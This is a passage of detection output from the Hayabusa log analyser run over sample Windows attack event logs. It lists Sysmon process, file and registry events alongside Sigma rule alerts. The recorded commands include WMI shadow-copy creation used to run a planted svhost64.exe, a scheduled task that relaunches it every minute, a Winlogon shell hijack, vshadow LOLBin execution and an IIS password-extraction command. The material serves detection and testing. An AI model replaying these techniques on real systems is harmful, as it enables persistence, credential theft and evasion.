)"" /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 4012 | PGUID: 365ABB72-3D70-5CEB-0000-0010F2EDFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-28 00:12:38.241 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c whoami /groups | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 3256 | PGUID: 365ABB72-FE66-5CEB-0000-001058F50B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx 2019-05-28 00:12:38.290 +09:00,IEWIN7,1,info,,Process Created,Cmd: whoami /groups | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c whoami /groups | LID: 0x3e7 | PID: 1168 | PGUID: 365ABB72-FE66-5CEB-0000-0010C7F80B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx 2019-05-28 00:12:38.290 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx 2019-05-28 00:12:38.290 +09:00,IEWIN7,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,../hayabusa-rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx 2019-05-28 00:12:38.290 +09:00,IEWIN7,1,medium,Disc,Whoami 
Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:43.990 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 1536 | PGUID: 365ABB72-FE6B-5CEB-0000-00102A090C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:44.055 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state | Process: C:\Windows\System32\wbem\WMIC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state | LID: 0x3e7 | PID: 3520 | PGUID: 365ABB72-FE6C-5CEB-0000-0010050C0C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:44.055 +09:00,IEWIN7,1,medium,Exec,WMI Reconnaissance List Remote Services,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmic_remote_service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:45.405 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 3876 | PGUID: 365ABB72-FE6D-5CEB-0000-0010332A0C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:45.491 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state | Process: C:\Windows\System32\wbem\WMIC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state | LID: 0x3e7 | PID: 1636 | PGUID: 365ABB72-FE6D-5CEB-0000-0010122D0C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:45.491 +09:00,IEWIN7,1,medium,Exec,WMI Reconnaissance List Remote Services,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmic_remote_service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:46.981 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\Temp\svhost64.exe | Process: C:\Windows\System32\notepad.exe | PID: 1944 | PGUID: 365ABB72-FD85-5CEB-0000-00104C0E0B00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:47.402 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 3448 | PGUID: 365ABB72-FE6F-5CEB-0000-0010F4370C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:47.478 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\"" | Process: C:\Windows\System32\wbem\WMIC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\"" | LID: 0x3e7 | PID: 3344 | PGUID: 365ABB72-FE6F-5CEB-0000-0010D33A0C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:47.478 +09:00,IEWIN7,1,medium,CredAccess,Shadow Copies Creation Using Operating Systems Utilities,,../hayabusa-rules/sigma/process_creation/proc_creation_win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:48.655 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 2412 | PGUID: 365ABB72-FE70-5CEB-0000-0010385C0C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:48.763 +09:00,IEWIN7,1,info,,Process Created,"Cmd: vssadmin List Shadows | Process: C:\Windows\System32\vssadmin.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" | LID: 0x3e7 | PID: 1820 | PGUID: 365ABB72-FE70-5CEB-0000-0010935F0C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:48.827 +09:00,IEWIN7,1,info,,Process Created,"Cmd: find ""Shadow Copy Volume"" | Process: C:\Windows\System32\find.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" | LID: 0x3e7 | PID: 1796 | PGUID: 365ABB72-FE70-5CEB-0000-0010D65F0C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:54.447 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 2356 | PGUID: 365ABB72-FE76-5CEB-0000-0010546E0C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:54.544 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe | Process: C:\Windows\System32\wbem\WMIC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe | LID: 0x3e7 | PID: 2840 | PGUID: 365ABB72-FE76-5CEB-0000-001077710C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:54.544 +09:00,IEWIN7,1,medium,CredAccess,Shadow Copies Creation Using Operating Systems Utilities,,../hayabusa-rules/sigma/process_creation/proc_creation_win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:54.544 +09:00,IEWIN7,1,medium,Exec,Suspicious WMI Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_wmi_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:54.632 +09:00,IEWIN7,1,info,,Process Created,Cmd: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe | Process: \Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x3e7 | PID: 1260 | PGUID: 365ABB72-FE76-5CEB-0000-001015780C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:54.632 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:59.519 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c %%SYSTEMROOT%%\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 4012 | PGUID: 365ABB72-FE7B-5CEB-0000-0010867F0C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:59.578 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management | Cmd: C:\Windows\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" | Process: C:\Windows\System32\schtasks.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c %SYSTEMROOT%\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" | LID: 0x3e7 | PID: 4044 | PGUID: 365ABB72-FE7B-5CEB-0000-0010D6820C00 | Hash: SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 11:13:52.171 +09:00,IEWIN7,1,info,,Process Created,"Cmd: vshadow.exe -nw -exec=c:\windows\System32\osk.exe c:\ | Process: C:\ProgramData\vshadow.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x14a73 | PID: 2432 | PGUID: 365ABB72-9960-5CEC-0000-0010B6981600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx
2019-05-28 11:13:52.429 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"Process Launched via DCOM | Cmd: DrvInst.exe ""1"" ""200"" ""STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot11"" """" """" ""6350c17eb"" ""00000000"" ""000005AC"" ""00000590"" | Process: C:\Windows\System32\drvinst.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 1968 | PGUID: 365ABB72-9960-5CEC-0000-001082AD1600 | Hash: SHA1=2D42A8EABA2829A1641FC580DA5E337C75997A99,MD5=44DAF0A410AB80E7CAB7C12EDE5FFB34,SHA256=3493630EE740508D0DB760A7648470F2987752D9B205CCCA805A66C3524E2B58,IMPHASH=ED4425CF217058DA6BDF611263E571DD",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx
2019-05-28 11:13:53.507 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: IEWIN7\IEUser | Parent Cmd: utilman.exe /debug | LID: 0x14a73 | PID: 2600 | PGUID: 365ABB72-9961-5CEC-0000-0010E1161700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx
2019-05-28 11:14:48.819 +09:00,IEWIN7,1,info,,Process Created,"Cmd: vshadow.exe -nw -exec=c:\windows\System32\notepad.exe c:\ | Process: C:\ProgramData\vshadow.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x14a73 | PID: 3092 | PGUID: 365ABB72-9998-5CEC-0000-00107D501700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx
2019-05-28 11:14:49.194 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"Process Launched via DCOM | Cmd: DrvInst.exe ""1"" ""200"" ""STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot12"" """" """" ""6d110b0a3"" ""00000000"" ""000005B8"" ""000004B0"" | Process: C:\Windows\System32\drvinst.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 1128 | PGUID: 365ABB72-9999-5CEC-0000-0010EB5A1700 | Hash: SHA1=2D42A8EABA2829A1641FC580DA5E337C75997A99,MD5=44DAF0A410AB80E7CAB7C12EDE5FFB34,SHA256=3493630EE740508D0DB760A7648470F2987752D9B205CCCA805A66C3524E2B58,IMPHASH=ED4425CF217058DA6BDF611263E571DD",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx
2019-05-28 11:14:50.413 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""c:\windows\System32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: IEWIN7\IEUser | Parent Cmd: vshadow.exe -nw -exec=c:\windows\System32\notepad.exe c:\ | LID: 0x14a73 | PID: 1516 | PGUID: 365ABB72-999A-5CEC-0000-0010C3A11700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx
2019-05-29 08:09:38.589 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - Startup User Shell Folder Modified | SetValue: HKU\S-1-5-21-3583694148-1414552638-2922671848-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\startup: c:\programdata\StartupNewHomeAddress | Process: C:\Windows\system32\reg.exe | PID: 1520 | PGUID: 365ABB72-BFB2-5CED-0000-0010F2C03600,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_startup_UserShellStartup_Folder_Changed_sysmon_13.evtx
2019-06-15 07:22:17.988 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Downloads\a.exe"" | Process: C:\Users\IEUser\Downloads\a.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1336d | PID: 4020 | PGUID: 365ABB72-1E19-5D04-0000-0010DFC60A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:22:21.503 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe | Process: C:\Users\IEUser\Downloads\a.exe | PID: 4020 | PGUID: 365ABB72-1E19-5D04-0000-0010DFC60A00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:22:21.535 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - Winlogon Shell | SetValue: HKU\S-1-5-21-3583694148-1414552638-2922671848-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"",explorer.exe | Process: C:\Users\IEUser\Downloads\a.exe | PID: 4020 | PGUID: 365ABB72-1E19-5D04-0000-0010DFC60A00",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:22:21.535 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Downloads\a.exe"" | Process: C:\Users\IEUser\Downloads\a.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\a.exe"" | LID: 0x1336d | PID: 1008 | PGUID: 365ABB72-1E1D-5D04-0000-001003E70A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:22:21.535 +09:00,IEWIN7,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:22:31.957 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious WMI module load | Image: C:\Windows\System32\wbem\wmiutils.dll | Process: C:\Users\IEUser\Downloads\a.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1008 | PGUID: 365ABB72-1E1D-5D04-0000-001003E70A00 | Hash: SHA1=03DC8ABDF9C9948FE6E783DCA9C6C8264D635F0A,MD5=5610B0425518D185331CB8E968D060E6,SHA256=E235186C3BF266EE9EC733D2CFF35E3A65DE039C19B14260F4054F34B5E8AD41,IMPHASH=523D1DB34FC36465E35F6201A2FD561B",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:22:31.957 +09:00,IEWIN7,7,info,Exec,WMI Modules Loaded,,../hayabusa-rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:22:32.222 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"" /stext ""C:\Users\IEUser\AppData\Local\Temp\tmpA185.tmp"" | Process: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\a.exe"" | LID: 0x1336d | PID: 1584 | PGUID: 365ABB72-1E28-5D04-0000-0010EC030B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:22:47.253 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 1552 | PGUID: 365ABB72-1E37-5D04-0000-001049360B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:22:52.457 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Downloads\a.exe | PID: 1008 | PGUID: 365ABB72-1E1D-5D04-0000-001003E70A00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:22:52.503 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Downloads\a.exe | PID: 4020 | PGUID: 365ABB72-1E19-5D04-0000-0010DFC60A00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:22:55.441 +09:00,IEWIN7,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 00000040 | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 688 | PGUID: 365ABB72-1E3F-5D04-0000-0010EC890B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:22:55.503 +09:00,IEWIN7,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 00000040 | LID: 0x3e7 | PID: 488 | PGUID: 365ABB72-1E3F-5D04-0000-0010568A0B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:22:55.566 +09:00,IEWIN7,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 00000040 | LID: 0x3e7 | PID: 1228 | PGUID: 365ABB72-1E3F-5D04-0000-0010FF8D0B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:22:55.707 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 948 | PGUID: 365ABB72-1E3F-5D04-0000-00102B9C0B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:06.691 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Process: C:\Windows\System32\dllhost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 2128 | PGUID: 365ABB72-1E4A-5D04-0000-0010ECC20B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:07.019 +09:00,IEWIN7,1,info,,Process Created,Cmd: efsui.exe /efs /keybackup | Process: C:\Windows\System32\efsui.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\lsass.exe | LID: 0xbc013 | PID: 2264 | PGUID: 365ABB72-1E4A-5D04-0000-0010BACF0B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
